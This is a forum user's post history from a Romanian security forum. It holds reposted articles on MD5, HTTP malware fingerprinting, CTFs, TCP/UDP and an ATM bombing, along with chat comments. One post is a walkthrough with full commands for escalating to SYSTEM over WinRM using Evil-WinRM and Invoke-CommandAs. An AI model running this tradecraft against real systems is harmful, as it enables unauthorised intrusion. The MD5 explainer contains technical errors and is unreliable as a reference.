Jump to content

Nytro

Administrators
  • Posts

    18664
  • Joined

  • Last visited

  • Days Won

    683

Everything posted by Nytro

  1. Breaking Down: MD5 Algorithm 824 SHARES ShareTweet Breaking Down: MD5 Algorithm by Aditya Anand The previous article that I wrote was on Breaking Down : SHA-1 Algorithm. I have explained the use and purpose of hashing over there, do have a look at it. After writing that I planned why not to write a whole series of article explaining different hashing algorithms and maybe after that even some cryptographic algorithms and their functioning. One of the major problem in the cybersecurity community is that as we get deep into security and we gradually lose touch with how these algorithms actually work and end up only downloading and using these libraries without giving a second thought about its functionality. This article is an attempt for me to explain the functionality of this hashing algorithms to those who are starting out or those who want to review the basics once again. Hashes are one of the most frequently used terms used in the cyber security domain and are extremely useful for various tasks like checksum, file integration verification, password verification etc. Here is a bird’s eye-view of the entire hashing algorithm of how. Let’s begin! MD5 hashing technique is where SHA 1 technique has arrived from hence these two are extremely similar. There are some more details I have mentioned over there that will make it easier for you to understand this entire functioning, so you can read that as well - Breaking Down : SHA-1 Algorithm Ok, now that you have read it let’s go through this whole thing and understand the functioning of MD5 hashing. 1. Append padding bits Let’s add few amount of bits to the message so that it becomes equivalent to 64 bits less than a multiple of 512. The addition of padding bits works in the form that we append 1 to the end of the message and then the rest of the bits that needs to be added are 0. 2. Append length bits This is the step in which we add the remaining 64 bits to the message so that the length of the message becomes an exact multiple of 512. The bits that we add here depends on the length of message ( original one without the padding ) if the length of that message is 8 then we add 1 in the first eight bits and for the next fifty six bits we add 0, if the length was 64 then all the 64 bits are 1 and if the length is greater than 64 then we calculate the modulus and append that many 1’s and the rest of the 64 bits will be 0’s 3. Initialise MD buffer This is one of the most important steps of all where we have four different buffers ( A, B, C & D ) and each one of them is 32 bits long. Their initial default values (little-endian): A = 0x67452301 B = 0xefcdab89 C = 0x98badcfe D = 0x10325476 4. Process each 512 bit block Now, let’s go back to our initial discussion where we saw that we perform a total of 64 operations that we perform on each of the 512 bit chunk. These operations that we perform is divided into 4 rounds and 16 operations in each of those rounds. The image below gives us an pictorial representation of the entire compression function i.e. the entire 64 operations. The peculiarity of each of these rounds is that in every round there are unique functions depicted below F(B,C,D) = (B AND D) OR ((NOT B) AND D) G(B,C,D) = (B AND D) OR (C AND (NOT D)) H(B,C,D) = B XOR C XOR D I(B,C,D) = C XOR (B OR (NOT D)) For the first round, which consists of 16 operations we will use the F(B,C,D), then we will use G(B,C,D), then H(B,C,D) and for the last round I(B,C,D). The 512 bit message chunk id is further divided into 16 parts, each of them is of 32 bits, we refer to them as M(1), M(2) and so on. We have a fixed value K(i) which is unique for each operation i.e. there are 64 K(i), mentioned below ( little-endian ). K[ 0.. 3] := { 0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee } K[ 4.. 7] := { 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501 } K[ 8..11] := { 0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be } K[12..15] := { 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821 } K[16..19] := { 0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa } K[20..23] := { 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8 } K[24..27] := { 0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed } K[28..31] := { 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a } K[32..35] := { 0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c } K[36..39] := { 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70 } K[40..43] := { 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05 } K[44..47] := { 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665 } K[48..51] := { 0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039 } K[52..55] := { 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1 } K[56..59] := { 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1 } K[60..63] := { 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 } We also carry out left bit rotation in each of the operations and their is an amount set for every operation of every function. The bits we need to rotate left by is depicted by ‘s’. The values of s for each operation are mentioned below. s[ 0..15] := { 7,12,17,22,7,12,17,22,7,12,17,22,7,12,17,22 } s[16..31] := { 5,9,14,20,5,9,14,20,5,9,14,20,5,9,14,20 } s[32..47] := { 4,11,16,23,4,11,16,23,4,11,16,23, 4,11,16,23 } s[48..63] := { 6,10,15,21,6,10,15,21,6,10,15,21,6,10,15,21 } Now, that we have the values that are required to carry out each operations we can focus on each and every round and hwo they function. 5. Output message digest The image here shows how every operation takes place. Inside every operation there are again a set of functions that are performed which provides us with the output which in turn acts as inputs for the next operation. We carry out these operations over and over again till we reach the last chunk of the 512 bit message and so the output that we obtain after processing the last chunk is the actual MD5 hash which id of 128 bits, as each A, B, C & D is of 32 bits each and combined together they form the total 128 bits. Conclusion The MD5 hashing algorithm has already been broken down and it basically should not be used at any place like banking and e-commerce websites. The have a look at the entire working of the MD5 hashing let’s go through it once again. The message that needs to be hashed is first broken down into 448 bits of pieces and for the last piece we carry out padding. An extra 64 bits is appended to it taking the total number of bits to be 512 bits, this acts as a message block going ahead. This message block of 512 bits is broken down in 16 parts of 32 bits each. which then acts as input for the operation that we carry out in the next step. Now let’s get into the main part of the hashing algorithm, there are a total of 64 operations that are performed on the 512 bits message block. These operations are initiated with a default value that I mentioned above ( A, B, C & D). There is a set of functions that are performed in each of these operations and the functions are already defined and the values which it is going to use. The 64 operations that we perform are also divided into 4 different rounds Each round has distinct set of functions, The 32 bit part of the message that we have broken down acts as an input ( depicted in above image ) and there is predefined values of K(i) as well, already mentioned above, the next step is to perform rotate left function, the number of bits the program rotates left is already defined as well. When an entire operation is done it passes on its values to the next operation. After 64 such operation is performed on the first 512 bit message block the output is then passed on for the next operation to be carried out on the next 512 bits till the last message block is reached. The output we receive from the operations being performed on the last message block is the hash of the original message of 128 bits. So that’s the short version of the whole functioning of the MD5 algorithm. Depiction of every operation About the Author CyberSec professional, crazy about tinkering with computers. I am a bug hunter and specialise in helping companies and organisations, by finding bugs in their web / mobile applications and help them solve it. Freelancing in the field of networking and cybersecurity. Spend my days working on Kali. Well-versed programmer in C, C++, Bash Script and JAVA language. Website : aditya12anand.com | Donate : paypal.me/aditya12anand Telegram : https://t.me/aditya12anand Twitter : twitter.com/aditya12anand LinkedIn : linkedin.com/in/aditya12anand/ E-mail : aditya12anand@protonmail.com The article has been originally published at: https://medium.com/bugbountywriteup/breaking-down-md5-algorithm-92803c485d25 Sursa; https://pentestmag.com/breaking-down-md5-algorithm/
      • 1
      • Upvote
  2. Mercedes-Benz C-Class W203 Instrument Cluster Hacked to Display Custom Text 12 Sep 2020, 11:19 UTC · by Bogdan Popa Home > News > Technology There are many ways to upgrade the infotainment capabilities of an old car, and while most people turn to head unit upgrades to get new-gen systems like Apple CarPlay and Android Auto, these bring absolutely no change to the information that you get on the instrument cluster. 34 photos Needless to say, carmakers themselves don’t provide too many customization options for the displays incorporated in the instrument panel, pretty much because the focus here should be on the speedometer and the other data related to the vehicle health status. The digital dash push has more or less changed this in the last few years, but as far as an older car is concerned, the options that are available for their owners are incredibly limited. A reverse engineer, however, has found a way to break into the instrument cluster system available on the 2006 Mercedes-Benz C-Class W203, eventually being able to display custom text and messages, as well as music playback controls. This isn’t something that everyone can do, there’s no doubt about it, but the developer has also published the full documentation on GitHub, so anyone with the right skills and an older C-Class W203 can technically do the same thing if they follow the provided instructions. The hack is powered by an Android tablet connected to the Can bus in the car, something that also allowed the developer to customize additional features of the C-Class, including the lighting system. At the end of the day, a lot of work has been put into this project, so it goes without saying it’s not something that any Average Joe can just run to get access to their car’s instrument cluster backend settings without knowing anything about coding or how the installed controllers work. And while for some it might seem easier to just replace the screen in the car, this isn’t actually possible in the W203, and the developer himself explains that designing a new instrument panel is pretty much the only alternative to this reverse engineering project. MERCEDES-BENZ W203 REVERSE ENGINEERING CAR HACKING MERCEDES-BENZ C-CLASS C-CLASS Sursa: https://www.autoevolution.com/news/mercedes-benz-c-class-w203-instrument-cluster-hacked-to-display-custom-text-148623.html
  3. Hfinger - fingerprinting HTTP requests Tool for fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage It's main objective is to provide a representation of malware requests in a shorter form than printing whole request, but still human interpretable. This representation should be unique between malware families, what means that any fingerprint should be seen only for one particular family. An academic paper accompanies work on this tool, describing, for example, motivation of design choices. It will be published here after peer-review process. The idea Basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about structure and values of some headers to provide means for further analysis. For example grouping of similar requests - at this moment it is still work in progress. After analysis of malware's HTTP requests and headers, some parts of requests were identified as being most distinctive. These include: Request method Protocol version Header order Popular headers' values Payload length, entropy and presence of non-ASCII characters Additionally, some standard features of request URL were also considered. All these parts were translated into set of features, described in details here. The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. Feature selection process will be described in the upcoming academic paper. Installation At this moment hfinger is distributed only via this repository. Tshark required before installation - tested on Xubuntu 20.04 LTS with tshark package in version 3.2.3. Please note, that as with any PoC, you should run it in a python virtual environment. Its setup is not covered here, but you can try this tutorial. Hfinger installation: Download repository. Unpack it to a chosen location. In terminal, change directory to the main catalogue of the unpacked repo. Enable venv Run python3 setup.py install Hfinger should be installed and ready to use. Usage Calling the tool from a command line: usage: hfinger.py [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2}] Hfinger - fingerprinting HTTP requests stored in pcap files optional arguments: -h, --help show this help message and exit -f FILE, --file FILE Read single pcap file -d DIR, --directory DIR Read pcap files from directory DIR -o output_path, --output-path output_path Path to the output directory -m {0,1,2}, --mode {0,1,2} Fingerprint report mode. 0 - optimal (default), 1 - informative, 2 - all features You must provide path to a pcap file (-f) or directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to provided directory (-o) using name of the source file. For example output of the command: python3 hfinger.py -f example.pcap -o /tmp/pcap will be saved to: /tmp/pcap/example.pcap.json When any issues are encountered, for example finding unknown header, they are printed to standard error output, so please monitor it. Fingerprint creation An example of a POST request is presented below. POST /dir1/dir2?var1=val1 HTTP/1.1 Host: 127.0.0.1:8000 Accept: */* User-Agent: My UA Content-Length: 9 Content-Type: application/x-www-form-urlencoded misc=test The fingerprint created by hfinger in the default report mode for this request is presented below. Particular features of the fingerprint are separated using |. They are described below in the order of appearance in the fingerprint. Firstly URL features are extracted: URL length represented as a logarithm base 10 of the length, extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt (in the example it is empty as the request does not contain it), number of variables in the URL (in the example there as only one variable var1). Secondly header structure features are analyzed: request method encoded as first two letters of the method (PO), protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9), and popular headers and their values, When analyzing popular headers, the request is checked if they appear in it. These headers are: Connection Accept-Encoding Content-Encoding Cache-Control TE Accept-Charset Content-Type Accept Accept-Language User-Agent When header is found in the request, its value is checked against table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to hfinger/configs/headerslow.json and value is encoded according to tables stored in hfinger/configs directory. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in in the encoding table it is hashed using FNV1a hash. Also if it is composed of multiple values, they are tokenized to provide list of values delimited with ,, for example Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contain "quality value" tag (q=), then the whole value is hashed with FNV. Finally values of User-Agent and Accept-Language headers are directly hashed using FNV. Some of the hfinger report modes provide a list of headers in order of appearance in the request. The list is created using similar method as described above. The header names are encoded using hfinger/configs/headerslow.json and separated with ,. If the header name does not start with upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then encoded representation is prefixed with !. If the header name is not on the list of known headers it is hashed using FNV. Finally, in the payload features, length of the payload is represented as a base 10 logarithm of the actual payload length rounded to an integer. Please note that the above description of fingerprint creation covers the default feature set. Hfinger is equipped with other feature sets, which can be chosen depending on the required amount of information. They are available via report modes switch. Report modes Hfinger operates in three fingerprint report modes, which differ in information extracted from requests: optimal, informative, all features. The modes were chosen in order to optimize hfinger capabilities to uniquely identify malware families versus its capability to generalize information about the requests. Description of features is provided here. The all features mode provide the most unique fingerprints, however it produces bigger number of fingerprints than other two modes. The optimal mode provides slightly less unique fingerprints, but also significantly reduces the number of fingerprints. The informative mode is similar to optimal regarding uniqueness, however it produces more fingerprints for the price of giving more information about URL, headers and payload. The modes consists of feature sets: optimal (the default - option 0😞 URL length represented as a base 10 logarithm of the actual length, extension of the requested file, number of variables in the URL, request method, protocol version, popular headers and their values, payload length represented a base 10 logarithm of the actual length rounded to integer, informative (option 1😞 URL length represented as a base 10 logarithm of the actual length, number of directories in the URL, extension of the requested file, number of variables in the URL, request method, protocol version, order of headers, popular headers and their values, payload length represented a base 10 logarithm of the actual length rounded to integer, and payload entropy represented as an integer, all features (option 2😞 URL length represented as a base 10 logarithm of the actual length, number of directories in the URL, average length of directory in the URL, represented as a base 10 logarithm of actual average length, extension of the requested file, length of the variable part of the URL, represented as a base 10 logarithm of the length and rounded to an integer, number of variables in the URL, average value length, represented as base 10 logarithm of the actual average value length rounded to an integer, request method, protocol version, order of headers, popular headers and their values, presence of non-ASCII characters (with "N" when such characters are present and "A" when they are not), payload length represented a base 10 logarithm of the actual length, payload entropy. Sursa; https://github.com/CERT-Polska/hfinger
  4. Run as SYSTEM using Evil-WinRM This is a quick blog post on how to elevate to SYSTEM without the need for PSEXEC when you are using PowerShell, or more specifcially in this case, PowerShell Remoting (WinRM). First off, let me introduce my tool of choice here. It’s Evil-WinRM. I spoke about it in the Practical Exploitation video here: https://www.youtube.com/watch?v=tVgJ-9FJKxE, so I won’t go too far indepth. It’s essentially the only WinRM tool that I’ve found to work well in a non-Windows native situation (also you can proxy it through proxychains which is AWESOME!!). Anyways. I want to document how to run commands as SYSTEM without the use of PSEXEC. I found this technique on a 4sysops blog post called Running PowerShell Remotely As System with Invoke-CommandAs. Side-note you should definitely bookmark thier blog it’s great. Invoke-CommandAs is not a native function of PowerShell, so you need to download it from the original author’s Github repo: https://github.com/mkellerman/Invoke-CommandAs For our uses all you need to do is get these two particular files: https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Public/Invoke-CommandAs.ps1 https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps1 Here you can see me putting those two files into a scripts directory I made inside of the Evil-WinRM folder. (git clone https://github.com/Hackplayers/evil-winrm + bundle install) root@attacker:~/evil-winrm/scripts# ls Invoke-CommandAs.ps1 root@attacker:~/evil-winrm/scripts# wget https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke- --2020-09-13 20:17:56-- https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.200.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.200.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 10009 (9.8K) [text/plain] Saving to: 'Invoke-ScheduledTask.ps1' Invoke-ScheduledTask.ps1 100%[=========================================================================================== 2020-09-13 20:17:56 (5.37 MB/s) - 'Invoke-ScheduledTask.ps1' saved [10009/10009] Once that’s ready, I run Evil-WinRM with the -s flag and specify the scripts directory I put the two files in. root@attacker:~/evil-winrm# ruby evil-winrm.rb -i 192.168.80.10 -u uberuser -s scripts/ Enter Password: Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\uberuser\Documents> Once I have the shell I load each of the scripts by typing out their file names (tab complete should work) *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-ScheduledTask.ps1 *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs.ps1 Once they are loaded you need to run the menu command to load the functions into memory on the attackers side. I haven’t looked at the code enough to know exactly why this is needed, but it doesn’t seem to work if you don’t. *Evil-WinRM* PS C:\Users\uberuser\Documents> menu ,. ( . ) " ,. ( . ) . (" ( ) )' ,' (` '` (" ) )' ,' . ,) .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( _".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') \_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ | __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ | \\ /| | |__ /_____/ \ /| | | \ | \/ Y \ /_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ / \/ \/ \/ \/ \/ By: CyberVaca, OscarAkaElvis, Laox @Hackplayers [+] Bypass-4MSI [+] Dll-Loader [+] Donut-Loader [+] Invoke-Binary [+] Invoke-CommandAs [+] Invoke-ScheduledTask As we can see both of the needed functions are loaded and we can finally issue our commands as SYSTEM with the -AsSystem flag and the command being whoami: *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs -ScriptBlock {whoami} -AsSystem nt authority\system *Evil-WinRM* PS C:\Users\uberuser\Documents> Sursa; https://malicious.link/post/2020/run-as-system-using-evil-winrm/
  5. Beginner’s Guide To CTFs How To Start With Security Capture The Flag Competitions. Security CTFs, or Capture The Flag competitions, are a great way to learn how to hack. They are competitions where competitors compete to try to find a “flag” to prove that they have hacked into a system. Why do CTFs?Permalink They are one of the best ways to learn specific security skills, like binary exploitation, web exploitation or reverse engineering. And since you often play CTFs in teams, CTFs are also a great way to make friends with likeminded security nerds. There are many collegiate-level CTFs where you can compete with fellow students, and you’ll find that many practicing security professionals play CTFs as well. Finally, CTFs train your hacker persistence. The CTF experience of getting stuck in a challenge, persist and finally finding a solution models real-life hacking scenarios. CTFs teach you to remain patient and optimistic when you are stuck hacking. Types of CTFsPermalink There are two main types of CTFs: Jeopardy-style and Attack-Defense-style. Jeopardy-style CTFs are essentially a list of hacking challenges that you can complete for flags that are worth a certain number of points. These challenges involve exploiting a vulnerability or solving a programming challenge to steal a “flag”. Teams compete to see who can find the most flags and gain the most points under a time limit. The hacking challenges in Jeopardy-style CTFs are often sorted by difficulty levels, so beginners can easily participate as well. There are often different skillsets that you can choose from, from cryptography, reversing, binary, web, programming, forensics, networking challenges to problems that are a mix of some or all of these skills. A more advanced version of CTFs is the Attack-and-Defense-style CTF. In these competitions, teams defend their own servers against attack, and attack opponents’ servers to score. These CTFs require more skills to compete and are almost always done in teams. For example, the annual DEFCON CTF finals is an Attack-and-Defense-style CTF. CTF skillsPermalink There are two very important things that you’d have to learn to do in order to start participating in the CTF world: finding teams and learning to gain new skills. How to find teamsPermalink First, how do you find teams to enter CTF competitions? If you are a high school or college student, see if your school has a cybersecurity club. These clubs often have already established CTF teams that you can join and compete with. On the other hand, if your school does not already have a club, try starting one and gather likeminded people! Before you know it, you’d have a group of teammates who are passionate about hacking as well. If you don’t belong to a school, social media is a great way to find teammates. Twitter is one of the best ways to reach out to people you want to collaborate with. Hacking forums and infosec discord channels are also good for this. How to gain the required technical skillsPermalink For beginner Jeopardy challenges, specific technical skills are often not required. After all, that is what you are trying to learn! However, it is good to have a basic understanding of how to use the command line and to have basic programming knowledge. More advanced technical skills can be gained by completing easier challenges or by googling. It is also helpful to keep in touch with the latest security news, as CTF challenges are often based on recently found vulnerabilities. List Of CTFs To Play NowPermalink Most CTF challenges run within a specific timeframe and are only available to registered teams. However, there are a large number of “always-online” Jeopardy-style CTFs that you can start playing right away. For a lot of these CTFs, you don’t need a team and can play without a time limit! Web exploitation CTFsPermalink Pentesterlab is a pretty good resource to start learning web penetration testing. In their challenges, you can read about the details of a vulnerability first before you exploit them hands-on. There are a wide variety of challenges available, from basic XSS to recently discovered web vulnerabilities. The Hacker101 CTF is another good resource. It has a large list of simple challenges that are aimed at building web hacking skills, with a focus on vulnerabilities that are most likely to show up in bug bounty programs. Reverse engineering CTFsPermalink If reverse engineering is more your vibe, you can check out this site. Crackme hosts many broken programs that you can try to hack. You can find broken programs on a variety of platforms: Windows, Unix, and multi-platforms. As a fun challenge, you can even write your own vulnerable program and share it with others! Mixed CTFsPermalink OverTheWire is the site that I recommend most beginners to start with. It is where I started playing CTF challenges. It starts with teaching the basics of using the command-line and programming. Then you are given a wide range of challenges to choose from: from web security, binary exploitation to reverse engineering. Hack This Site! is also a pretty good one. It is a little like OverTheWire in that is has a variety of challenges, ranging from super easy to advanced. It is also one of the few places where you can find forensics and steganography challenges if that’s what you are into. Live CTFsPermalink Finally, if you want to participate in a live CTF or an Attack-and Defense style CTF, check out CTFtime.org for a list of current and upcoming CTF events. CTF Etiquette!Permalink Before you go on to playing CTFs (and having the time of your life!), here are a few sacred rules of CTF participation that you should keep in mind. First, absolutely do not post solutions and flags online! The purpose of CTFs is to help people become better hackers through the mental struggle of solving challenges. Giving solutions away is denying the chance for others to learn. On the other hand, you also should not try to google solutions or ask for flags online. You can ask for help, discuss with others or even collaborate in solving a challenge, but asking or googling for solutions takes away from the experience. Even if you try to understand the solution, it is not the same as working hard to and finally finding the answer yourself! Have Fun!Permalink CTFs are a great hobby that ultimately makes you a better hacker. In fact, many of the most skilled hackers came from CTF backgrounds. I hope you’ll find the experience rewarding as well. Best of luck and have fun! Categories: Hacking Updated: September 10, 2020 Sursa: https://vkili.github.io/blog/hacking/intro-ctf/
  6. Nytro

    DarkWeb

    Unde sa ne inregistram? Pe acel opensc? Dread? Nu am idee care sunt.
  7. Pentru cei interesati sa prezinte, asteptam CFP: https://rstcon.com/cfp/
  8. Da, in general cei care isi risca libertatea astfel probabil isi vor lua cat mai multe masuri, atat sa se asigure ca atacul le iese, cat si ca nu sunt prinsi. Ca tot veni vorba, acum X ani am discutat cu cineva de la o banca care se ocupa de partea cu securitatea ATM-urilor, fizica. Si mi-a zis o chestie foarte interesanta legata de skimmere (acele device-uri care iti copiaza datele de pe card, de banda magnetica). Eu cand merg la un ATM trag ca taranul de partea in care se introduce cardul si de tastatura. Iar el a zis asa: "Daca gasesti vreodata un skimmer, il pui la loc si pleci. Apoi daca vrei poti anunta politia. Acel skimmer ii costa pe ei o gramada de bani, pana la 10.000 de $ si pentru el ar fi in stare sa te taie in miezul zilei. Cu siguranta e cineva prin zona, nu pleaca si isi lasa device-ul nesupravegheat". Ceea ce fac altii prin afara si se filmeaza cum descopera ei astfel de lucruri poate fi periculos.
  9. Nu cred ca "informatiile necesare" sunt o problema. Din cate stiam eu, puteai sa iti cumperi singur un ATM, cred ca era vreo 5000 de $, de pe ebay, aliexpress sau mai stiu eu ce. La calcule e important zidul in care sunt prinse pentru a-si da seama cat explozibil sa foloseasca si e bine ca nu folosesc prea mult... De fapt nici nu cred ca e nevoie, altii prin SUA le trageau direct cu masinile alea mari ale lor (motor de 5L, cred ca trage). Eu sunt curios cum sparg apoi seiful. Cu siguranta se poate, probabil si cu un polidisc (si multe discuri schimbate).
  10. RST Con va avea loc pe data de 20 noiembrie 2020 (vineri). Asteptam sugestii si in legatura cu "site-ul oficial": https://rstcon.com/ De asemenea asteptam aplicarile pentru prezentari.
  11. Da, e vorba de o inflamatie la coloana vertebrala. Scria pe undeva ca "se mai intampla" la testarea vaccinurilor. Cipul are prea multi tranzistori si undele sale bio-electro-magnetice interfereaza cu undele encefalo-neurlogice transmise de catre coloana vertebrala in corp (acele mesaje de Keep-Alive intre coloana si organe pentru a determina downtime-ul unora). Un fel de Human Jammer acest cip... Mama, as fi bun de facut o mizerie dinaceea de site conspirationist, as face avere.
  12. UDP vs. TCP: A Quick Comparison Sep 7 2020 Some background you may or may not care about# I took a networking class in college. It wasn’t a great experience, as the professor was at the school really just to pursue research, leaving us peasant students to 5-question long exams, each 25% of our grade and with .05% of the content from 200+ long slide decks. Needless to say, it wasn’t a very useful class. So here I am, some number of years into my cybersecurity career, able to recognize and speak about different network protcols at fluctuating levels depending on the day. It’s time to change that. I want to understand, like really understand what’s going on. This blog post is going to cover some of the most fundamental concepts in the networking world: UDP and TCP, two transport-level protocols. UDP (User Datagram Protocol)# UDP is a connectionless, message-oriented protocol. It functions through the sending and receiving of packets without having to establish a connection between a client and server. As a result, once a message has been sent, there is no further communication with the message receiver. Additionally, the packets are not numbered. This means that packets are not guaranteed to arrive in order, or even to arrive at all. UDP does not wait for acklowedgement of message receipt, it simply yeets the message and moves on. Due to its connectionless nature, UDP is good for real-time information delivery. As messages are told to be transmitted, they are transmitted. Packets may be dropped due to lack of congestion control. Because the sender isn’t waiting for an ack, nor is the receiver going to send an ack, dropped packets will go unnoticed by both the client and server. This is okay in certain real-time examples, such as streaming. A momentary glitch will not deter a viewer. This also means that UDP is able to support broadcasting. Error checking in UDP occurs through a 16-bit checksum. The checksum is used as follows: the sender computes the checksum corresponding to the data being sent and stores it in the header; upon receipt, the receiver computes the checksum using the received data and compares it to the checksum in the header. It’s important to note that the checksum is mandatory in IPv6 but not IPv4. The UDP segment, or the data portion, of an IP packet includes an 8-byte header followed by variable length data. The header is composed as follows: The first 4 bytes of the header store the port numbers of the source and destination. The next 2 bytes of the header store the length of the UDP segment. The last 2 bytes of the header store the checksum. TCP/IP (Transmission Control Protocol)# TCP is a handshake-based, connection-oriented protocol. TCP provides a continuous flow of data through a manner of sending numbered packets which ensure correct receipt order. While this takes more time than UDP, which sends as instructed and receives as is, it makes TCP the more reliable transport protocol of the two. If packets are dropped, they can be recognized as missing and then retransmitted. The reliability provided by TCP makes it a choice protocol in situations requiring packet receipt acknowledgement and/or ensured packet delivery. However, this reliability and congestion control behavior comes at a cost of overhead. TCP is slower than UDP due to the latency created by establishing and maintaining connections. Checksum use is required by TCP, for both IPv4 and IPv6. This ensures error detection despite IP version. A TCP header is between 20 and 60 bytes. Like the UDP header, there are reserved bytes for the source and destination port numbers, there is also a field to store the amount of data to be transmitted during the session, and the checksum is included towards the end. The large quantity of additional header space, compared to UDP, is used to store information required to establish connections, maintain connections, and support the acknowledgements required for the reliability aspects (i.e. syn/ack behavior) of the protocol. TL;DR# UDP is the less reliable protocol, but can be used for real-time data delivery, including broadcasting, due to its constant stream of packet transmission. TCP is a more reliable but slower data transport protocol used for data transmission between two endpoints. It uses acknowledgements to confirm packet receipt. Both protocols support checksums, which should be utilized for error detection. Sursa: https://casey.is/blogging/udpvstcp/
  13. Dar la noi banii oricum sunt de plastic si se pot spala (la propriu) ma gandesc. Doar sa nu fie ceva foarte special care sa nu iasa. E posibil.
  14. Am tot auzit de acel lucru cu marcarea banilor, dar oare e pe bune? Nu cred ca s-ar mai face atatea astfel de porcarii daca ar fi. Banii sunt tinuti in casete, fiecare caseta cu un anumit tip de bancnota. Dar nu am vazut sa fie altceva pe acolo (am vazut bancomat deschis, de aproape sa zicem). PS: Mai e un mit conform careia "Brrrrr"-ul acela cand sunt adusi banii ar fi doar un MP3, are cineva idee? De fapt asta e singura mea reala curiozitate legata de ATM-uri
  15. Sincer, poate ar fi mai simplu sa il cumperi, nu pare sa fie tocmai scump (private version nu comercial).
  16. Bancomate aruncate în aer în orașul Otopeni. Autorii nu au fost încă găsiți 08.09.2020 07:40 FOTO: amator Explozii marți dimineață în orașul Otopeni, unde două bancomate au fost aruncate în aer. Fațada clădirii unde erau aparatele a fost distrusă. Oamenii spun că explozia a fost atât de puternică încât au crezut că este cutremur. Inspectoratul de Poliție al Județului Ilfov a fost sesizat marți dimineață cu privire la faptul că la parterul unui bloc din orașul Otopeni a avut loc o distrugere. Din primele verificări s-a stabilit faptul că distrugerile au avut loc la două bancomate ce aparțin unei bănci. Bancomate aruncate în aer în orașul Otopeni - FOTO: amator La fața locului s-au deplasat polițiștii orașului Otopeni împreună cu efective de pompieri și specialiști din cadrul IGPR, precum și conducerea IPJ ILfov. Au fost luate măsuri pentru delimitarea perimetrului și conservarea locului faptei. Nicio persoană nu a fost rănită, dar au fost înregistrate pagube materiale. Polițiștii ilfoveni fac verificări și investigații pentru a stabili ce s-a întâmplat și pentru a-i găsi pe autori. Sursa; https://www.digi24.ro/stiri/actualitate/bancomate-aruncate-in-aer-in-orasul-otopeni-autorii-nu-au-fost-inca-gasiti-1364787 Ce oameni... Daca tot nu sunt tehnici, macar sa le traga cu o masina mai mare ceva, cel putin asa e riscul mai mic ca oameni nevinovati sa pateasca ceva. Oricum, succes la deschiderea lui.
  17. Ah, hydrogel bio ala era cu cipuri si senzori? Eu il folosesc pe post de lubrifiant, isi face treaba! PS: Hidrogel gasiti pe emag: https://www.emag.ro/hidrogel-horticol-1kg-hidrogel1000/pd/DCSM7CBBM/ Asta e epica: "acesta s-ar conecta la rețeaua wireless, Internetul Lucrurilor (IoT – Internet of Things)" - Trebuie sa fii retardat (stiind putin IT) sa crezi mizeriile din acel articol. Un microchip 5G cat un bob de orez? Cu tot cu antena? Apropo, am lucrat la o firma unde un coleg citea standardul 3G sau 4G nu mai stiu ce era atunci, acum ceva ani. Mizeria aia de document de specificatii avea 2-3 MII de pagini. De ce ar folosi 5G si nu GSM normal? Vor sa aiba viteza de download de peste 1Gbps cand trag porno 4K sau 8K la noi in corp, nu? Ba, eu inteleg ca exista Gigel care fac bani din vizualizari ale dobitocilor pe mizeriile pe care le scriu, dar in cacat, sa vina cu niste teorii ale conspiratiei mai pertinente si mai logice. Probabil nici bunica-mea nu crede cacaturile alea.
  18. Am inceput sa facem cate ceva. Revenim cu detalii cand avem ceva cat de cat functional.
  19. Mai degraba aduna spam, o gramada... Sugestia mea ar fi sa primesti mesaj privat aici si sa nu iti lasi mailul public.
